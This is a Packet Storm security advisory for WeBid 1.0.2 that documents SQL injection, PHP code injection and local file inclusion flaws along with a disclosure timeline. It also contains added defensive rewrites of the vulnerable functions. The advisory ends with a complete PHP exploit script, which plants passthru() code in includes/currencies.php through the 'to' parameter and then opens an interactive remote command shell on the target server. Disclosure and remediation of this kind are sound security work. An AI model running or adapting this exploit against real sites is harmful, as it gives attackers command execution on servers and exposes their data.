WeBid 1.0.2 Remote Code Execution

2011-07-04T00:00:00
ID PACKETSTORM:102756
Type packetstorm
Reporter EgiX
Modified 2011-07-04T00:00:00

Description

                                        
<?php
  
/*  
  
------------------------------------------------------------  
WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit  
------------------------------------------------------------  
  
author...: EgiX  
mail.....: n0b0d13s[at]gmail[dot]com  
link.....: http://www.webidsupport.com/  
  
  
This PoC was written for educational purposes. Use it at your own risk;  
the author will not be responsible for any damage.  
  
  
[-] Vulnerable code to SQL injection in feedback.php:  
  
154. $query = "SELECT title FROM " . $DBPrefix . "auctions WHERE id = " . $_REQUEST['auction_id'] . " LIMIT 1";  
155. $res = mysql_query($query);  
156. $system->check_mysql($res, $query, __LINE__, __FILE__);  
157. $item_title = mysql_result($res, 0, 'title');  
  
Input passed through $_REQUEST['auction_id'] isn't properly sanitised before being used in the SQL query at line 154. Because the value lands in a numeric context with no surrounding quotes, no quote character is needed and this injection works regardless of the magic_quotes_gpc setting.  
  
[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in logout.php:  
  
21. if (isset($_COOKIE['WEBID_RM_ID']))  
22. {  
23. $query = "DELETE FROM " . $DBPrefix . "rememberme WHERE hashkey = '" . $_COOKIE['WEBID_RM_ID'] . "'";  
24. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);  
25. setcookie('WEBID_RM_ID', '', time() - 3600);  
26. }  
  
Input passed through $_COOKIE['WEBID_RM_ID'] isn't properly sanitised before being used in the SQL query at line 23.  
  
  
[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in user_login.php:  
  
84. if (isset($_COOKIE['WEBID_ONLINE']))  
85. {  
86. $query = "DELETE from " . $DBPrefix . "online WHERE SESSION = '" . $_COOKIE['WEBID_ONLINE'] . "'";  
87. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);  
88. }  
  
Input passed through $_COOKIE['WEBID_ONLINE'] isn't properly sanitised before being used in the SQL query at line 86.  
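The three queries above (feedback.php line 154, logout.php line 23, user_login.php line 86) rebuilt with mysqli prepared statements, as an added example that is not WeBid code. It assumes $db is an open mysqli connection and that $DBPrefix is the configured table prefix, a config value rather than user input; table and column names are hard-coded, only the request and cookie values are bound.

```php
<?php
// Added example (not WeBid code): request and cookie values are bound as
// parameters instead of being concatenated into SQL. $db is assumed to be
// a mysqli connection, $DBPrefix the configured table prefix.

// feedback.php line 154: the id column is numeric, so accept only an integer.
function auctionTitle(mysqli $db, string $DBPrefix, $auctionId): ?string
{
    if (filter_var($auctionId, FILTER_VALIDATE_INT) === false) {
        return null;                     // "1 UNION SELECT ..." is rejected here
    }
    $id = (int) $auctionId;
    $stmt = $db->prepare("SELECT title FROM {$DBPrefix}auctions WHERE id = ? LIMIT 1");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($title);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? $title : null;
}

// logout.php line 23 and user_login.php line 86: the cookie is a string.
// Binding it as 's' makes a quote inside a payload such as  x' OR '1'='1
// part of the data, whatever magic_quotes_gpc is set to. $table and $column
// are fixed names chosen by the caller below, never user input.
function deleteByToken(mysqli $db, string $table, string $column, string $token): int
{
    $stmt = $db->prepare("DELETE FROM {$table} WHERE {$column} = ?");
    $stmt->bind_param('s', $token);
    $stmt->execute();
    $deleted = $stmt->affected_rows;
    $stmt->close();
    return $deleted;
}

if (isset($_COOKIE['WEBID_RM_ID'])) {
    deleteByToken($db, $DBPrefix . 'rememberme', 'hashkey', $_COOKIE['WEBID_RM_ID']);
    setcookie('WEBID_RM_ID', '', time() - 3600);
}
if (isset($_COOKIE['WEBID_ONLINE'])) {
    deleteByToken($db, $DBPrefix . 'online', 'SESSION', $_COOKIE['WEBID_ONLINE']);
}
```

With parameters the magic_quotes_gpc caveat in the headings above disappears entirely: the driver sends the value separately from the statement text, so there is no quoting to get wrong on either the numeric or the string path.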
  
[-] Vulnerable code to arbitrary PHP code injection (works with magic_quotes_gpc = off) in /includes/converter.inc.php:  
  
61. function buildcache($newaarray)  
62. {  
63. global $include_path;  
64.  
65. $output_filename = $include_path . 'currencies.php';  
66. $output = "<?php\n";  
67. $output.= "\$conversionarray[] = '" . time() . "';\n";  
68. $output.= "\$conversionarray[] = array(\n";  
69.  
70. for ($i = 0; $i < count($newaarray); $i++)  
71. {  
72. $output .= "\t" . "array('from' => '" . $newaarray[$i]['from'] . "', 'to' => '" . $newaarray[$i]['to'] . "', 'rate' => '" . $newaarray[$i]['rate'] . "')";  
73. if ($i < (count($newaarray) - 1))  
74. {  
75. $output .= ",\n";  
76. }  
77. else  
78. {  
79. $output .= "\n";  
80. }  
81. }  
82.  
83. $output .= ");\n?>\n";  
84.  
85. $handle = fopen($output_filename, 'w');  
86. fputs($handle, $output);  
87. fclose($handle);  
88. }  
  
Input passed to the buildcache() function through $_POST['from'] or $_POST['to'] isn't properly sanitised before being  
written into the currencies.php file as PHP source. A value that closes the string and array literals is stored as code, and since includes/currencies.php can be requested directly from the web (the exploit below POSTs to it), this gives arbitrary PHP code execution.  
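A replacement for buildcache() that keeps the same cache layout ($conversionarray[0] is the timestamp, $conversionarray[1] the list of from/to/rate rows) but never splices raw input into PHP source, as an added example that is not WeBid code. It assumes currency codes are three upper-case letters (ISO 4217) and reuses the $include_path global from the original.

```php
<?php
// Added example (not WeBid code): builds currencies.php without string
// concatenation of user input. Assumes ISO 4217 three-letter codes;
// $include_path is the same global the original buildcache() uses.

function buildcacheSafe(array $newaarray, string $include_path): void
{
    $rows = [];
    foreach ($newaarray as $row) {
        // Whitelist first: the exploit's 'to' value  \0'));print(...)//
        // matches nothing in [A-Z]{3}, so it never reaches the file at all.
        foreach (['from', 'to'] as $key) {
            if (!isset($row[$key]) || !is_string($row[$key]) || !preg_match('/^[A-Z]{3}$/', $row[$key])) {
                throw new InvalidArgumentException("invalid currency code in '$key'");
            }
        }
        if (!isset($row['rate']) || !is_numeric($row['rate'])) {
            throw new InvalidArgumentException('invalid rate');
        }
        $rows[] = ['from' => $row['from'], 'to' => $row['to'], 'rate' => (string) $row['rate']];
    }

    // Second layer: var_export() emits each value as a quoted PHP string
    // literal with ' and \ escaped, so even an unexpected value could only
    // ever be data, not code.
    $conversionarray = [(string) time(), $rows];
    $output = "<?php\n\$conversionarray = " . var_export($conversionarray, true) . ";\n";

    // Write to a temp file and rename, so a request that includes
    // currencies.php mid-write never sees a truncated file.
    $target = $include_path . 'currencies.php';
    $tmp    = $target . '.' . getmypid() . '.tmp';
    if (file_put_contents($tmp, $output, LOCK_EX) === false || !rename($tmp, $target)) {
        @unlink($tmp);
        throw new RuntimeException('could not write currency cache');
    }
}

// Constructed input: a legitimate row, then the exploit's 'to' value.
$cacheDir = sys_get_temp_dir() . '/';
try {
    buildcacheSafe([['from' => 'USD', 'to' => 'EUR', 'rate' => '0.69']], $cacheDir);
    buildcacheSafe([['from' => 'USD', 'to' => "\0'));print('_code_');//", 'rate' => '1']], $cacheDir);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";   // reached on the second call
}
```

Independently of the serialisation fix, the exploit's second stage only works because includes/currencies.php answers direct HTTP requests; keeping the generated cache outside the document root, or denying direct requests to includes/ in the web server configuration, closes that path as well.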
  
[-] Vulnerable code to LFI (works with magic_quotes_gpc = off) in /includes/converter.inc.php:  
  
18. if (isset($_GET['lan']) && !empty($_GET['lan']))  
19. {  
20. if ($user->logged_in)  
21. {  
22. $query = "UPDATE " . $DBPrefix . "users SET language = '" . mysql_real_escape_string($_GET['lan']) . "' WHERE id = " . $user->user_data['id'];  
23. }  
24. else  
25. {  
26. // Set language cookie  
27. setcookie('USERLANGUAGE', $_GET['lan'], time() + 31536000, '/');  
28. }  
29. $language = $_GET['lan'];  
30. }  
31. elseif ($user->logged_in)  
32. {  
33. $language = $user->user_data['language'];  
34. }  
35. elseif (isset($_COOKIE['USERLANGUAGE']))  
36. {  
37. $language = $_COOKIE['USERLANGUAGE'];  
38. }  
39. else  
40. {  
41. $language = $system->SETTINGS['defaultlanguage'];  
42. }  
43.  
44. if (!isset($language) || empty($language)) $language = $system->SETTINGS['defaultlanguage'];  
45.  
46. include $main_path . 'language/' . $language . '/messages.inc.php';  
  
Input passed through the $_GET['lan'] or $_COOKIE['USERLANGUAGE'] parameter isn't properly sanitised before  
being used to include files on line 46. This can be exploited to include arbitrary local files.  
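The language selection from lines 18-46 above, rewritten so that the value is checked against the language directories that actually exist before it is stored in a cookie, written to the database or passed to include. This is an added example, not WeBid code; $main_path, $DBPrefix, $system and $user are the same variables the original uses.

```php
<?php
// Added example (not WeBid code): whitelist the language name against the
// installed language/ subdirectories. $main_path, $DBPrefix, $system and
// $user are assumed to exist as in the original converter.inc.php.

function availableLanguages(string $main_path): array
{
    $langs = [];
    foreach (glob($main_path . 'language/*', GLOB_ONLYDIR) ?: [] as $dir) {
        $langs[] = basename($dir);          // e.g. "english"
    }
    return $langs;
}

// Returns $candidate only if it exactly names an installed language.
// Strict comparison rejects arrays (lan[]=x), "../" sequences, absolute
// paths and NUL-byte tricks alike, because none of them is in the list.
function validLanguage($candidate, array $allowed): ?string
{
    return (is_string($candidate) && in_array($candidate, $allowed, true)) ? $candidate : null;
}

$allowed  = availableLanguages($main_path);
$language = null;

if (isset($_GET['lan']) && !empty($_GET['lan'])) {
    $language = validLanguage($_GET['lan'], $allowed);
    if ($language !== null) {
        if ($user->logged_in) {
            // Already whitelisted; escaping kept as defence in depth.
            $query = "UPDATE " . $DBPrefix . "users SET language = '" . mysql_real_escape_string($language) . "' WHERE id = " . (int) $user->user_data['id'];
        } else {
            setcookie('USERLANGUAGE', $language, time() + 31536000, '/');
        }
    }
} elseif ($user->logged_in) {
    $language = validLanguage($user->user_data['language'], $allowed);
} elseif (isset($_COOKIE['USERLANGUAGE'])) {
    $language = validLanguage($_COOKIE['USERLANGUAGE'], $allowed);
}

if ($language === null) {
    $language = $system->SETTINGS['defaultlanguage'];
}

include $main_path . 'language/' . $language . '/messages.inc.php';
```

The database value is checked too, not just the request and cookie: a language stored before the fix, or edited directly in the table, would otherwise reach the include on the next login.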
  
[-] Information leak in the /logs directory: it is web-accessible, so anyone can read cron.log and error.log.  
  
  
[-] Disclosure timeline:  
  
[19/06/2011] - Vulnerabilities discovered  
[19/06/2011] - Vendor contacted  
[20/06/2011] - Vendor contacted again  
[21/06/2011] - No response from vendor  
[21/06/2011] - Issue reported to http://sourceforge.net/apps/mantisbt/simpleauction/view.php?id=34  
[22/06/2011] - Issue reported to http://www.webidsupport.com/forums/project.php?do=issuelist&projectid=1  
[22/06/2011] - Vendor responded and released patches: http://www.webidsupport.com/forums/showthread.php?3892  
[04/07/2011] - Public disclosure  
  
*/  
  
error_reporting(E_ERROR);  
set_time_limit(0);  
  
if (!extension_loaded("curl")) die("cURL extension required\n");  
  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_HEADER, 1);  
curl_setopt($ch, CURLOPT_VERBOSE, 0);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);  
  
function http_post($page, $data)  
{   
global $ch, $url;  
  
curl_setopt($ch, CURLOPT_URL, $url.$page);  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
  
return curl_exec($ch);  
}  
  
print "\n+----------------------------------------------------------------------+";  
print "\n| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |";  
print "\n+----------------------------------------------------------------------+\n";  
  
if ($argc < 2)  
{  
print "\nUsage......: php $argv[0] <url>\n";  
print "\nExample....: php $argv[0] https://localhost/";  
print "\nExample....: php $argv[0] http://localhost/webid/\n";  
die();  
}  
  
$url = $argv[1];  
  
// Stage 1: inject PHP into includes/currencies.php through the unescaped  
// 'to' value written by buildcache(). The payload closes the string, the  
// array literal and the statement, then opens passthru(); the ");" that  
// buildcache() writes on the following line completes that call, and the  
// trailing "//" discards the rest of the generated line.  
$code = rawurlencode("\0'));print('_code_');passthru(base64_decode(\$_POST['c'])//");  
http_post("converter.php", "action=convert&from=USD&to={$code}");  
  
// Stage 2: each command is POSTed base64-encoded straight to the cache file,  
// which is reachable under includes/; its output follows the _code_ marker.  
while(1)  
{  
print "\nwebid-shell# ";  
if (($cmd = trim(fgets(STDIN))) == "exit") break;  
preg_match("/_code_(.*)/s", http_post("includes/currencies.php", "c=".base64_encode($cmd)), $m) ? print $m[1] : die("\n[-] Exploit failed\n");  
}  
?>  
  
  